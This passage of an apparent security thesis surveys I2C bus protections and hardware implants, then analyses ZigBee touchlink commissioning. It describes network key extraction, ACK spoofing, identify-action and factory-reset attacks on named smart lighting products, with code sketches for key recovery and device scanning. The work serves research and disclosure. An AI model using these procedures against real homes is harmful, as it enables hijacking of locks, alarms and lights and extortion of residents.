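The following sketch illustrates the general direction of such a scheme: authenticated encryption of an I2C data payload with AES-GCM using mbed TLS. It does not reproduce the exact design of Lazaro et al.; in particular, the nonce construction, the key provisioning, and the binding of the (unencrypted) slave address as associated data are assumptions made for illustration.

    /* Sketch only: illustrates AES-GCM protection of an I2C data payload.
     * Key provisioning and nonce construction are illustrative assumptions
     * and do not reproduce the scheme of Lazaro et al. [171]. */
    #include <stddef.h>
    #include "mbedtls/gcm.h"

    int protect_i2c_frame(const unsigned char key[16],
                          const unsigned char nonce[12],   /* e.g., a frame counter  */
                          unsigned char slave_addr,        /* addressing stays clear */
                          const unsigned char *payload, size_t len,
                          unsigned char *ciphertext, unsigned char tag[16])
    {
        mbedtls_gcm_context gcm;
        mbedtls_gcm_init(&gcm);

        int ret = mbedtls_gcm_setkey(&gcm, MBEDTLS_CIPHER_ID_AES, key, 128);
        if (ret == 0) {
            /* The unencrypted slave address is bound to the ciphertext as
             * additional authenticated data, so it cannot be altered unnoticed. */
            ret = mbedtls_gcm_crypt_and_tag(&gcm, MBEDTLS_GCM_ENCRYPT, len,
                                            nonce, 12, &slave_addr, 1,
                                            payload, ciphertext, 16, tag);
        }
        mbedtls_gcm_free(&gcm);
        return ret;
    }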

Shwartz et al. [156] propose the idea of a hardware-based interface proxy firewall to protect I2C buses against malicious hardware. Unfortunately, they do not present a technical concept of their idea, so a concrete design of this firewall remains future work. From our perspective, the challenge of such a firewall is to distinguish between legitimate and malicious bus participants. Since a malicious participant can easily spoof a legitimate participant, a simple blacklist or whitelist approach is not effective. To protect against this threat, an authentication infrastructure or physical security measures are needed. As an advantage, this firewall would not need to be part of the official I2C specifications. On the downside, additional hardware is needed on the PCB to implement the firewall.


Oberg et al. [223] observed information flows in the I2C bus system by applying taint tracking. After identifying explicit and implicit information flows, they proposed to add an adapter to each slave device that is placed between this device and the bus. These adapters coordinate access to the slave devices by allowing access to only one device at any given point in time. We note that these proposals only consider passive attackers, not active attackers. Thus, using a malicious IoT implant, it is still possible to manipulate data on the bus since the implant has no adapter that controls its access to the bus. The advantage of this approach is that the adapters do not have to be specified in the I2C standard. The disadvantage is the need for additional hardware components on the PCBs, which increases space requirements, cost, and energy consumption.

4.7 Related Work on Malicious Hardware

Previous research investigated the insertion of malicious hardware at three stages: in the design phase, during the fabrication phase, and in the post-fabrication phase. Especially hardware trojans attracted a high amount of research in the last decade. From a high-level perspective, hardware trojans are malicious modifications of the hardware during the design or fabrication process. In contrast, malicious hardware implants are alien elements that are added to a system after the fabrication process.

There exist different approaches to insert malicious trojans into hardware. One approach is the modification of the system design at hardware description language (HDL) level, which results in additional logic being added to the IC. Prototypes of these trojans have mainly been implemented and evaluated using field programmable gate arrays (FPGAs). The threat of malicious hardware trojans was first shown and evaluated by Agrawal et al. [4]. They also proposed a detection mechanism based on side-channel fingerprinting. King et al. [154] introduced hardware trojans that are able to gain unchecked memory access as well as to execute malicious firmware on the target. Lin et al. [181] presented a hardware trojan that provides physical side-channels to exfiltrate cryptographic material from an IC. Hicks et al. [124] proposed unused circuit identification (UCI), a method to identify and remove suspicious circuits using data flow graph analysis. A year later, Sturton et al. [283] presented a prototype of a hardware trojan that defeats the UCI detection mechanisms. Fern et al. [90] used hardware trojans to build a covert communication channel between different components in a system-on-a-chip. Gómez-Bravo et al. [106] presented a hardware trojan that attacks I2C communication, targeting a mobile robotic application.

Another approach of inserting malicious hardware is the implementation of hardware trojans at gate level during fabrication. In contrast to modifications at HDL level, this approach does not add additional logic to the system but only modifies existing hardware elements. Shiyanovskii et al. [267] introduced lifetime-reducing reliability trojans, which induce aging effects resulting from alterations of the fabrication processes. Becker et al. [24] demonstrated a variant in which a hardware trojan is implemented at gate level by manipulating the dopant polarity of existing transistors. Kumar et al. [163] used hardware trojans to inject faults during the execution of a lightweight cipher, enabling them to retrieve secret keys. This hardware trojan was also induced by altering the dopant area at gate level. A final approach of inserting malicious hardware is the adding of analog circuits to the system. The concept of an analog hardware trojan was introduced by Yang et al. [318]. They demonstrated that an attacker is able to insert analog circuits into a system at fabrication time.

The first ICs that relate to hardware implants were called mod chips [253], which modify functions of the target system, e.g., to circumvent copyright protection mechanisms in video playback devices or to enable restricted features in game consoles. Compared to design and fabrication phase attacks, less attention has been paid by the academic community to malicious hardware attacks in post-fabrication phases. Shwartz et al. [156] demonstrated how aftermarket components, e.g., third-party touchscreens used in repairs of broken mobile devices, could be manipulated such that a malicious mobile phone app can get root access to the device. In a non-academic context, Datko and Reed [57] implemented a hardware implant inspired by the NSA ANT catalog [13]. Their proof-of-concept features a GSM interface to exfiltrate data and connects to the target system via a VGA display adapter using I2C communication. To relay data from the computer, a malware on the target system is assumed that sends data via I2C to the implant. In contrast to our work, this implant does not fulfill design criteria C1 and C6. FitzPatrick [95] presented a number of proof-of-concepts for hardware implants that connect to targeted systems via I/O pins or JTAG. Although these implants fulfill most design criteria, they lack a communication interface to an IoT or cellular infrastructure (design criterion C2).

4.8 Conclusion

In this chapter, we described the implementation and evaluation of the first malicious IoT implant, showing that IoT infrastructure enables novel hardware-level attack vectors. These threats grow with the expansion of LPWANs, which are expected to supersede mobile telephony networks as providers of M2M connectivity within a few years. Future threat models for hardware security have to take these threats into account.

Chapter 5

Insecurity of ZigBee Touchlink Commissioning

The exploitation of security vulnerabilities in IoT systems and applications can have severe consequences for the physical safety and privacy of users. In this chapter, we present a case study on the threat of object exploitation that analyzes the security measures of a popular smart home network standard.

Contents

5.1 Introduction
5.2 Background on ZigBee
    5.2.1 System Model
    5.2.2 Security
    5.2.3 Commissioning
5.3 Threat Model
    5.3.1 Security Goals and Attacker Model
    5.3.2 Threat Scenarios
5.4 Security Analysis of Touchlink Commissioning
    5.4.1 Penetration Testing Framework Z3sec
    5.4.2 Testbed
    5.4.3 Denial-of-Service Attacks
    5.4.4 Attacks to Gain Control
    5.4.5 Evaluation of Wireless Range
    5.4.6 Recovery
5.5 Disclosure and Response
5.6 Discussion
5.7 Related Work on ZigBee Security
5.8 Conclusion

5.1 Introduction

ZigBee is a popular standard for wireless low-power communication in the Internet of Things (IoT), especially in the domain of smart home networks. The ZigBee Alliance, a non-profit organization of more than 400 member companies maintaining the ZigBee specifications, lists more than 1,300 certified products [334], and claims to have the largest base of installed IoT devices worldwide [331] with more than a hundred million devices [333].

In December 2016, the latest ZigBee specifications, denoted as ZigBee 3.0, were released to the public. These specifications define function clusters for several smart home applications, including security-critical applications such as door locks, window shades, and intruder alarm systems. To prevent the manipulation and unauthorized control of these applications, appropriate security measures are crucial for ZigBee networks. One of the most critical parts of the security design is commissioning, which is the procedure of either starting a new network or integrating a new node into an existing network. During the process of joining a new node to an existing network, this node needs to be equipped with the network key in a secure manner, which is a challenging task for heterogeneous IoT networks that interconnect products of multiple manufacturers.

ZigBee 3.0 provides two different commissioning procedures to accomplish this task: EZ-Mode commissioning and touchlink commissioning. In this chapter, we focus on touchlink commissioning, which was originally developed to easily integrate devices into connected lighting systems that follow the (legacy) ZigBee Light Link standard. The basic idea of touchlink commissioning is to rely on close physical proximity instead of cryptographic authentication for joining new nodes to a network. The ZigBee 3.0 specifications inherited the touchlink commissioning procedure as a commissioning option for ZigBee 3.0 products without giving guidelines on whether an application is suitable for touchlink commissioning.

Our contribution is twofold. As a first contribution, we provide a security analysis of the ZigBee touchlink commissioning procedure, which, to the best of our knowledge, has not been the subject of a comprehensive security analysis before. During our investigations, we analyzed the specifications and learned that the touchlink communication relies on inter-PAN frames, which are neither secured nor authenticated. Furthermore, the transport of the network key to a joining device is protected solely by a global master key, the touchlink preconfigured link key. This key is distributed to manufacturers of touchlink-enabled products under a non-disclosure agreement (NDA) but was leaked in March 2015 and cannot be renewed due to backward-compatibility demands towards legacy ZigBee Light Link products. In addition, we learned from the specifications that the distance check between the joining node and the initiator is based on a simple signal strength threshold.

As a second contribution, we developed and evaluated a real-world attack system to eavesdrop on and inject packets into the communication of ZigBee networks. In this context, we release the open-source penetration testing framework Z3sec, which is able to create arbitrary touchlink commands and provides an interface to control ZigBee-certified devices once the network key is known. We evaluated our penetration testing framework on popular ZigBee-certified and touchlink-enabled products of four different manufacturers. In our evaluation, we demonstrated the extraction of the current network key from a distance of 130 meters by passively eavesdropping on a touchlink commissioning procedure. In the domain of active attacks, we were able to permanently disconnect nodes from their legitimate network or to reset them to factory-new. We can also trigger the so-called identify action, e.g., causing light bulbs to blink, for several hours. Furthermore, we demonstrated that we can remove nodes from their legitimate networks and join them to the attacker's network. In our evaluation, we were able to perform such an active attack from a distance between 15 and 190 meters, depending on the tested products. Due to limitations of the experimental setup, longer distances might be possible.

In conclusion, our evaluation shows that the support of touchlink commissioning is sufficient to compromise the security of ZigBee 3.0 applications. In our threat scenarios, we outline that already a single touchlink-enabled device allows attackers to take control over arbitrary devices in the ZigBee network, including security-critical applications.

This chapter is structured as follows. We introduce the ZigBee 3.0 standard in Section 5.2. In Section 5.3, we present the threat model for the security analysis. In Section 5.4, we perform the security analysis of the touchlink commissioning procedure, which contains the description of novel attacks as well as their practical evaluation. In Section 5.5, we describe the disclosure to the manufacturers and their responses. We discuss the results of our evaluation, consequences, and mitigation in Section 5.6. We present related work in Section 5.7, and conclude this chapter in Section 5.8.

5.2 Background on ZigBee

ZigBee is a wireless low-power standard that connects embedded technologies in wireless personal area networks (WPANs). Compared to Wi-Fi, ZigBee-certified devices send smaller packets and consume far less energy, while ZigBee has a larger wireless range than Bluetooth.

The ZigBee specifications are maintained by the ZigBee Alliance, a global non-profit organization that comprises over 400 member companies. The ZigBee Alliance defines the network, security, and application layers and supervises the conformance and interoperability of ZigBee-certified products. The ZigBee 3.0 specifications, which were ratified in December 2015 and released to the public in December 2016, replace the ZigBee Pro specifications [336] from 2012. The main difference between ZigBee 3.0 and ZigBee Pro is that the ZigBee Pro specifications defined several application profiles comprising customized sets of features and protocols for specific application areas. Examples of such profiles are ZigBee Home Automation [329] for applications in residential environments, ZigBee Smart Energy [328] for smart metering, and ZigBee Light Link [327] for connected lighting systems. The fragmentation of the ZigBee Pro standard resulted in interoperability problems between ZigBee-certified products of different profiles, so the ZigBee Alliance decided to merge these profiles into one standard, which is ZigBee 3.0. An exception is the Smart Energy profile, which remains independent due to special requirements of smart metering applications. The ZigBee 3.0 standard is defined in multiple specification documents, of which the ZigBee 3.0 Base Device Behavior specification [330] and the ZigBee 3.0 Cluster Library specification [332] are publicly available.


5.2.1 System Model

The ZigBee 3.0 specifications describe three logical types of nodes: coordinator, router, and end device. Each node can comprise one or more devices and is, at any point in time, designated to only one of the logical types. Coordinators and routers are usually devices that have a permanent power supply, in contrast to end devices, which are usually battery-powered.

Figure 5.1: Security network models: (a) centralized security, (b) distributed security. Notation: C = coordinator, R = router, E = end device.

Each ZigBee 3.0 network is either a distributed or a centralized security network. As illustrated in Figure 5.1a, a centralized security network is managed by a coordinator that includes the trust center. This coordinator authenticates new nodes and joins them to the network. In contrast, a distributed security network is formed by a router and has no coordinator as shown in Figure 5.1b. A new node is authenticated and joined to the network by an arbitrary router, which becomes its parent node.

5.2.2 Security

The ZigBee 3.0 stack sits on top of the physical layer and medium access control (MAC) layer defined in the IEEE 802.15.4 specifications [136]. Security measures in ZigBee applications are only applied to the network and application layers. Although the MAC layer of the IEEE 802.15.4 standard specifies multiple encryption and authentication mechanisms, these mechanisms are not used in ZigBee applications. ZigBee-certified devices facilitate the AES-CCM* authenticated encryption scheme¹ with a 128-bit network key. This network key is shared between all devices of a network and used to secure the communication.

¹ Compared to AES-CCM (without asterisk), this specific mode also allows encryption-only or integrity-only variants.
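For illustration, the following sketch applies AES-CCM to a network-layer payload with mbed TLS. The 13-byte nonce built from the sender's extended address, the frame counter, and the security control field follows the ZigBee convention, but the exact field layout and the surrounding frame handling are simplified assumptions rather than a specification-accurate implementation; when both encryption and authentication are used, CCM* behaves like standard CCM.

    /* Sketch only: simplified illustration of ZigBee-style AES-CCM protection
     * of a network-layer payload; nonce layout and frame handling are
     * assumptions, not specification-accurate ZigBee security processing. */
    #include <string.h>
    #include "mbedtls/ccm.h"

    int protect_nwk_payload(const unsigned char network_key[16],
                            const unsigned char src_ext_addr[8],
                            unsigned int frame_counter,
                            unsigned char security_control,
                            const unsigned char *header, size_t header_len,   /* authenticated only */
                            const unsigned char *payload, size_t payload_len,
                            unsigned char *ciphertext, unsigned char mic[4])
    {
        unsigned char nonce[13];
        memcpy(nonce, src_ext_addr, 8);
        nonce[8]  = (unsigned char)(frame_counter);
        nonce[9]  = (unsigned char)(frame_counter >> 8);
        nonce[10] = (unsigned char)(frame_counter >> 16);
        nonce[11] = (unsigned char)(frame_counter >> 24);
        nonce[12] = security_control;

        mbedtls_ccm_context ccm;
        mbedtls_ccm_init(&ccm);
        int ret = mbedtls_ccm_setkey(&ccm, MBEDTLS_CIPHER_ID_AES, network_key, 128);
        if (ret == 0) {
            /* 4-byte MIC; the header is integrity-protected but sent in clear. */
            ret = mbedtls_ccm_encrypt_and_tag(&ccm, payload_len, nonce, sizeof(nonce),
                                              header, header_len,
                                              payload, ciphertext, mic, 4);
        }
        mbedtls_ccm_free(&ccm);
        return ret;
    }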


5.2.3 Commissioning

Commissioning is the process in which either a new ZigBee network is started or a new node is joined to an existing ZigBee network. The ZigBee 3.0 standard specifies two commissioning procedures: EZ-Mode commissioning and touchlink commissioning. While the support of EZ-Mode commissioning is mandatory for each ZigBee 3.0 device, manufacturers can decide whether touchlink commissioning is enabled in their products. The specifications do not provide any guideline on whether touchlink commissioning is appropriate for a certain application. In addition, touchlink is supported by all legacy devices that follow the ZigBee Light Link specifications.

EZ-Mode Commissioning. The EZ-Mode must be invoked by a user action, e.g., by pushing a button on the device. After this mode is activated, the node remains in EZ-Mode for a time frame of 3 minutes, which can be extended through further user actions. In EZ-Mode, a node that is not joined to a network scans for open networks in its wireless range. In case the node finds a suitable network, it attempts to join this network using MAC association as specified in IEEE 802.15.4. If the network allows the node to join, the node waits to become authenticated and receives the network key. In a centralized security network, the network key is encrypted using either the publicly known default global Trust Center link key, which is provided in the ZigBee specifications, or a pre-configured link key that is derived from an install code, i.e., a unique code printed on the node in a manufacturer-specific fashion. In a distributed security network, the network key is transmitted after being encrypted with the NDA-protected distributed security global link key.

Touchlink Commissioning. The touchlink commissioning procedure was first introduced in the ZigBee Light Link standard and later adopted by the ZigBee 3.0 specifications. Touchlink commissioning is patented by Philips [172] and was specifically designed to make connected lighting systems easy to deploy and use for consumers. Compared to other commissioning options, touchlink commissioning provides extended functionality that goes beyond the plain joining of devices. The objective was to enable use cases in which commissioning is performed between a bulb and a low-function device, e.g., a remote control. For such scenarios, touchlink commissioning offers the possibility to manage network features, such as reset to factory-new or channel switch, with so-called touchlink commands.

Figure 5.2 describes the commissioning protocol for joining a device, denoted as target or end device, to an existing ZigBee network. The initiator is usually a remote control or a bridge device that is connected to the Internet. First, the initiator starts the device scan procedure by sending scan requests on specific channels as defined in the specifications. These scan requests include a randomly generated transaction identifier.

Figure 5.2: Touchlink commissioning protocol.

The target replies with a scan response containing the same transaction identifier, a random response identifier, and further information. The device scan may yield multiple potential nodes, from which the user can select one for the next steps. The user has the option to send an identify request to a device, upon which the target performs a pre-defined identify action, e.g., a bulb flashes for a few seconds. An identify request contains the corresponding transaction identifier as well as the duration of the identify action. To join a new node to a network, the initiator encrypts the current network key with the touchlink preconfigured link key, builds a network join end device request containing the encrypted network key, the transaction identifier as well as further network information, and then sends this command frame to the selected node. On receiving the message, the joining node decrypts the network key using the touchlink preconfigured link key and replies with a network join end device response indicating success or failure.
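Because the network key is protected only by AES under the (leaked) touchlink preconfigured link key, an eavesdropper who captures this exchange can recover it. The sketch below assumes a hypothetical helper derive_transport_key() that performs the key expansion from the transaction and response identifiers defined in the ZigBee Light Link specification (its exact construction is omitted here); the function names and the single-block decryption of the 16-byte encrypted network key field are illustrative.

    /* Sketch only: recovering the network key from a captured touchlink
     * network join request.  derive_transport_key() stands in for the key
     * expansion defined in the ZigBee Light Link specification. */
    #include <stdint.h>
    #include "mbedtls/aes.h"

    /* Hypothetical helper: expands the leaked touchlink preconfigured link key
     * together with the transaction and response identifiers observed on air. */
    extern void derive_transport_key(const uint8_t master_key[16],
                                     uint32_t transaction_id, uint32_t response_id,
                                     uint8_t transport_key[16]);

    void recover_network_key(const uint8_t master_key[16],
                             uint32_t transaction_id, uint32_t response_id,
                             const uint8_t encrypted_network_key[16],
                             uint8_t network_key[16])
    {
        uint8_t transport_key[16];
        derive_transport_key(master_key, transaction_id, response_id, transport_key);

        mbedtls_aes_context aes;
        mbedtls_aes_init(&aes);
        mbedtls_aes_setkey_dec(&aes, transport_key, 128);
        /* The 16-byte encrypted network key field fits a single AES block. */
        mbedtls_aes_crypt_ecb(&aes, MBEDTLS_AES_DECRYPT,
                              encrypted_network_key, network_key);
        mbedtls_aes_free(&aes);
    }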

5.3 Threat Model

This section introduces the security goals and the attacker model for the subsequent security analysis and outlines a number of threat scenarios.

5.3.1 Security Goals and Attacker Model

The ZigBee specifications describe security assumptions [336, p. 426], such as the safekeeping of key material and the proper implementation of security protocols, but do not define security goals [14]. For this reason, we define the following security goals that apply to ZigBee networks:

• Confidentiality: Only legitimate entities are allowed to access data and commands sent within the network.


• Integrity: Data and commands sent within the network are not tampered with.

• Authenticity: The receiver is able to reject commands and data sent by illegitimate entities.

• Availability: The functionalities and data of the devices in the network are continuously available to all legitimate entities.

The threat model is determined as follows: The user of the ZigBee network is trusted and honest, and installs the network as required by the manufacturer. The online account credentials for remote access to the ZigBee network are not disclosed. The nodes of the network are certified by the ZigBee Alliance and follow the protocols described in the ZigBee Light Link or the ZigBee 3.0 specifications. Therefore, all touchlink-enabled ZigBee devices are equipped with the touchlink preconfigured link key.

The goal of the attacker is to violate any of the security goals mentioned above. We assume that attackers have neither physical access to the ZigBee devices nor to the local area network (LAN) or wireless LAN (WLAN) to which a ZigBee device might be connected. The only capability of the attacker is to eavesdrop on and inject packets into the wireless communication of at least one touchlink-enabled node of the targeted ZigBee network. Thus, the attacker controls an IEEE 802.15.4 radio transceiver that is present within the wireless range of the targeted node. Note that the radio transceiver can be mounted on a drone such that no close physical proximity of the person performing the attack is required. This potential scenario was demonstrated in [248].

5.3.2 Threat Scenarios

There exists a wide variety of ZigBee-certified devices in the smart home domain, ranging from sensors like smoke detectors and hygrometers, over controllers for building services, to appliances like washing machines. The ZigBee 3.0 specifications also define function clusters for security-critical applications, such as front door locks, window shade controllers, and intruder alarm systems. Thus, the attack surface, which we evaluate on touchlink-enabled connected lighting systems, potentially affects all future ZigBee-certified products that are compliant with either the ZigBee Light Link or ZigBee 3.0 specifications. Security-critical ZigBee devices can be attacked in two ways: either directly, in case the targeted ZigBee device supports touchlink commissioning, or indirectly, in case there exists at least one touchlink-enabled device in a ZigBee network that contains security-critical devices. In the following, we outline three threat scenarios.

Scenario #1. We assume an application that authorizes door access to a restricted area. The network is organized as a centralized security network and communicates based on the ZigBee 3.0 standard. One of the nodes of the network is a ZigBee-certified door lock that implements touchlink commissioning. As we show in Section 5.4.3, the attacker can reset arbitrary touchlink-enabled nodes to factory-new without knowing any cryptographic secrets. The attacker applies this reset attack to the door lock, which puts the lock in a factory-new state and most probably clears the way for the attacker.

Scenario #2. We assume a smart home network comprising various applications including an intruder alarm system. This network is organized as a ZigBee 3.0 distributed security network. We further assume that an attacker can eavesdrop on the touchlink commissioning procedure of an arbitrary touchlink-enabled device that is joined to this network, e.g., a new light bulb. From this captured communication, the attacker extracts the network key as described in Section 5.4.4. As a consequence, the attacker can decrypt all further network communication as well as inject commands into the network. Hence, the attacker can reset the intruder alarm system to factory-new by sending spoofed network leave commands, and break into the house without triggering the alarm.

Scenario #3. A household intended for elderly living deploys a distributed security network consisting of a large number of touchlink-enabled devices. In Section 5.4.3, we present attacks that allow an attacker to permanently disconnect touchlink-enabled devices from their legitimate network and to trigger a manufacturer-specific identify action for a duration of up to 18 hours. For example, in the case of light bulbs, this action is blinking, but for other devices it can also be making sounds or moving. The attack proceeds as follows: first, the attacker permanently disconnects all touchlink-enabled devices, and then makes them blink, beep, or move for several hours. Upon payment, the attacker promises to stop the attacks and to reconnect the devices to the legitimate network. The residents can decide whether they want to manually reset and recommission each device or to pay the demanded amount of money. Since the recovery of ZigBee devices from the permanent disconnect attack can be an extremely cumbersome task that requires dexterity and precise timing, as described in Section 5.4.6, residents might prefer to pay the ransom.

5.4 Security Analysis of Touchlink Commissioning

We divide our attacks into two types: passive and active attacks. Passive attacks only eavesdrop on the wireless communication of nodes in the targeted network, while active attacks require the attacker to interact with the targeted node via wireless communication. In addition, we categorize our attacks according to the goal of the attacker: In the first category, we describe denial-of-service (DoS) attacks that exploit security weaknesses in the concept of so-called inter-PAN frames. These attacks require no knowledge of any cryptographic material. In the second category, we show attacks that allow the attacker to control devices in the network. These attacks require knowledge of the touchlink preconfigured link key, which was leaked in March 2015. Table 5.1 provides an overview of all attacks that are described in this section.


Table 5.1: Overview of attacks.

                               Type of Attack       Attacker Goals
    Attack                     Active   Passive     DoS   Control
    Identify Action              ✓                   ✓
    Reset to Factory-New         ✓                   ✓
    Permanent Disconnect         ✓                   ✓
    Hijack                       ✓                         ✓
    Network Key Extraction                ✓                ✓

The attacks in this section outline the procedures to compromise a single touchlink-enabled device. All attacks can be easily extended to target multiple devices at the same time by running the attack procedures for different target devices simultaneously.

5.4.1 Penetration Testing Framework Z3sec

For our research, we developed the penetration testing framework Z3sec in Python to evaluate the security of ZigBee 3.0 devices. These tools and their documentation are available as open-source software on GitHub². The Z3sec framework consists of three major components: First, a touchlink library to build arbitrary touchlink packets and to keep track of source addresses and sequence numbers. Second, a crypto module that provides the functionality to encrypt and decrypt ZigBee packets. This component also handles key transport frames, in particular decrypting and encrypting the transported network key. Third, the radio interface module, which enables the communication between the radio transceivers and the touchlink library. As radio transceiver, we utilize the USRP B200 from Ettus, a software-defined radio covering the radio-frequency range between 70 MHz and 6 GHz. The USRP features an FPGA and connects to a host computer via USB 3.0. We use Scapy-radio [236] as the interface to send and receive ZigBee packets with the USRP. Scapy-radio itself uses capabilities of GnuRadio and an IEEE 802.15.4 GnuRadio flow graph implementation [26]. In addition, we implemented a command line tool that performs the attack procedures described in the following sections, and a module that is able to send or spoof control commands to the devices once the network key is disclosed.

5.4.2 Testbed

We analyzed the following four systems: a Philips Hue starter set including one bridge and three white and color ambiance (LCT001) LED bulbs, which is shown in Figure 5.3a.

² https://github.com/IoTsec/Z3sec


Figure 5.3: The four evaluated ZigBee-certified connected lighting systems: (a) Philips Hue, (b) Osram Lightify, (c) GE Link, (d) IKEA Trådfri.

Furthermore, we deployed an Osram Lightify gateway with a Classic A60 tunable white LED bulb, as depicted in Figure 5.3b. Our third system is a GE Link starter pack containing a Link hub and a Link A19 soft white LED light bulb, as shown in Figure 5.3c. The last system is the IKEA Trådfri system, consisting of a Trådfri LED 980lm light bulb and a Trådfri remote control, as depicted in Figure 5.3d. All these systems implement the ZigBee Light Link standard, for which touchlink commissioning is mandatory. Thus, these systems are representative of arbitrary touchlink-enabled ZigBee devices. Due to the novelty of the ZigBee 3.0 specifications, only one manufacturer has released ZigBee 3.0-certified products so far, to the best of our knowledge (as of March 2017). These ZigBee 3.0-certified products by Ubisys do not support touchlink commissioning. Nevertheless, the presented attacks apply to all future ZigBee 3.0 products that enable touchlink commissioning.

Before starting our evaluation, we updated the Philips Hue firmware to the then-latest version 01031131 as well as the API to version 1.12.0. We updated the Osram Lightify gateway WLAN firmware to version 1.1.2.101 and the gateway ZigBee firmware to version 1.2.0.67. We found no possibility to update the GE Link firmware using the manufacturer-recommended Wink app. At the time of the evaluation, there existed neither a mobile device app for IKEA Trådfri nor a possibility to update the firmware of the Trådfri bulbs or remote control³.

The attacker equipment comprises a laptop on which our penetration testing framework Z3sec is installed. A radio transceiver, the Ettus USRP, is connected to the laptop. We started the evaluation of each attack from the default settings, in which the lighting system works as intended and is not compromised.

3 IKEA released a Trådfri gateway and a Trådfri mobile device app in April 2017.


5.4.3 Denial-of-Service Attacks

Our DoS attacks exploit the concept of inter-PAN frames, which are a special type of ZigBee frames that allow the communication between different personal area networks (PANs). In 2008, inter-PAN frames were introduced in the ZigBee Smart Energy application profile. In the purpose description, the ZigBee Smart Energy standard states that inter-PAN transmissions allow ZigBee devices to ‘perform limited, insecure, and possibly anonymous exchange of information’ [328, p.81]. In the context of smart metering, for which the ZigBee Smart Energy standard was intended, the mandate for such a transmission mechanism is the ‘market requirement to send pricing information to very low cost devices’, e.g., refrigerator magnets showing the current energy consumption or prices. The ZigBee Light Link standard adopted the inter-PAN transmission mechanism to enable the commissioning of networks with constrained devices, e.g., remote controls. In the touchlink commissioning procedure, inter-PAN frames are used to transmit touchlink commands and their responses between initiator and target device. Since there exists no shared key material between different PANs, inter-PAN frames are neither secured nor authenticated. Hence, all attacks presented in this section are performed without requiring any knowledge of the touchlink preconfigured link key or of any other cryptographic material relating to these devices.

Active Device Scan. The active device scan searches for ZigBee devices in wireless range of the attacker’s equipment. The active device scan is a mandatory step in preparation of any further attack.

Procedure. The attacker builds a scan request, then sends this inter-PAN command frame on all ZigBee channels consecutively and listens for a few milliseconds on each channel for scan responses. Through the reception of scan responses, the attacker learns about all ZigBee devices that are also listening on this channel. ZigBee uses 16 channels in the 2.4 GHz ISM band, channels 11 to 26, while channels 1 to 10 are located in other ISM bands. The ZigBee 3.0 specifications define four primary channels on which devices listen for touchlink scans: 11, 15, 20, and 25. These channels are used for commissioning and normal operations, while all remaining channels can be used as backup channels.
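The scan loop can be summarized by the following sketch. The radio object is a hypothetical wrapper around the USRP/Scapy-radio interface, and build_scan_request/parse_scan_response stand in for the touchlink library; none of these are the real Z3sec function names, and the dwell time is an example value.

```python
# Sketch of the active device scan described above (hypothetical radio API).
import time

PRIMARY_CHANNELS = [11, 15, 20, 25]     # touchlink primary channels
ALL_CHANNELS = list(range(11, 27))      # ZigBee channels in the 2.4 GHz band

def active_device_scan(radio, build_scan_request, parse_scan_response,
                       channels=ALL_CHANNELS, dwell_ms=50):
    """Send a touchlink scan request on each channel and collect responses."""
    discovered = []
    for channel in channels:
        radio.set_channel(channel)
        radio.send(build_scan_request())
        deadline = time.monotonic() + dwell_ms / 1000.0
        while time.monotonic() < deadline:
            frame = radio.receive(timeout=deadline - time.monotonic())
            if frame is None:
                break
            response = parse_scan_response(frame)
            if response is not None:
                # A scan response carries, among others, the extended address,
                # the network update identifier, and the response identifier.
                discovered.append((channel, response))
    return discovered
```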

Evaluation. The active device scan works with all four lighting systems. All light bulbs responded to the scan request, and the Osram Lightify gateway also answered each time. The GE Link hub does not respond to scan requests, and the Philips Hue bridge only replies if the button on the bridge was pushed within the last 30 seconds.

ACK Spoofing. All following attacks start with an active device scan and then send further inter-PAN command frames. When target devices in Osram Lightify or GE Link implementations receive a scan request, they answer with the scan response and then wait


for a MAC-layer acknowledgment (ACK). If they do not receive an ACK within a specified time frame of 864 microseconds, they drop further communication. Z3sec is too slow in sending this ACK since the processing of the received ZigBee frames is not performed on the hardware platform but in software, and is therefore delayed by a few milliseconds. However, we can impersonate an existing ZigBee device, referred to as the spoofed device in Figure 5.4, by setting the extended source address of the scan request to the extended address of the spoofed device. As a result, the spoofed device sends an ACK upon reception of a scan response, even though it never sent a scan request. This is an inherent feature of the IEEE 802.15.4 MAC layer, and we can leverage this mechanism to provide ACKs in time. In contrast, Philips Hue and IKEA Trådfri devices do not require any ACKs for their scan responses, making our attacks easier to implement.

Figure 5.4: Acknowledgment spoofing: the attacker spoofs a third device so that it sends an ACK to the target device in time.

Identify Action Attack. The touchlink commissioning procedure provides the possibility to request a ZigBee device to identify itself via a pre-defined identify action, e.g., flashing, dimming, or beeping. Originally, the identify procedure was intended to give the user a way to select and identify a certain node that should be added to the network, but the identify action can also be abused by attackers.

Procedure. After an active device scan, the attacker can send an identify request to the targeted ZigBee device. The identify request contains the transaction identifier and the identify duration. The identify duration can be at most 0xFFFE, which corresponds to a duration of 18 hours, 12 minutes, and 14 seconds. If the identify duration is set to 0, a previously started identify procedure is aborted before the specified duration has elapsed. Setting the identify duration to 0xFFFF requests the device to perform the identify procedure for a device-specific default period of time, usually a few seconds. Upon reception of the identify request, the targeted ZigBee device starts its identify action for the defined period of time.
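The maximum value follows directly from interpreting the duration field in seconds, as the following small helper illustrates (0xFFFE = 65534 seconds).

```python
# Converting the identify duration field (in seconds) to h:mm:ss.
def identify_duration_to_hms(duration_field: int) -> str:
    seconds = duration_field                 # 0xFFFE = 65534 seconds
    hours, rest = divmod(seconds, 3600)
    minutes, secs = divmod(rest, 60)
    return f"{hours}:{minutes:02d}:{secs:02d}"

print(identify_duration_to_hms(0xFFFE))      # -> 18:12:14
```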

Evaluation. All lighting systems are vulnerable to the identify action attack. During the blinking of the lights, the user can neither turn off nor control the light bulbs using


the apps provided by the manufacturers. The only way to shut down the lights is to physically disconnect the bulbs from the power supply. The IKEA Trådfri bulbs are an exception: they dim their lights up and down instead of flashing, and their identify action can be aborted immediately by pressing an arbitrary button on the remote control. The attacker can abort the attack at any time by sending another identify request with the duration field set to zero. The maximum duration of blinking that can be triggered with a single identify request is shown in Table 5.2. We assume that this duration depends on the manufacturer's implementation of touchlink commissioning. After performing the identify action attack, the Philips Hue bulb and the IKEA Trådfri bulb return to their pre-attack state and color, while the Osram Lightify bulb and the GE Link bulb change to their default state and color. This attack also works if the device is turned off but supplied with power.

Table 5.2: Maximum duration of the identify action attack.
System            Maximum duration
Philips Hue       18:12:14 h
Osram Lightify     9:12:53 h
GE Link            9:06:31 h
IKEA Trådfri       0:01:00 h

Reset to Factory-New Attack. In this attack, the attacker resets the configuration of a ZigBee device to the factory-new state.

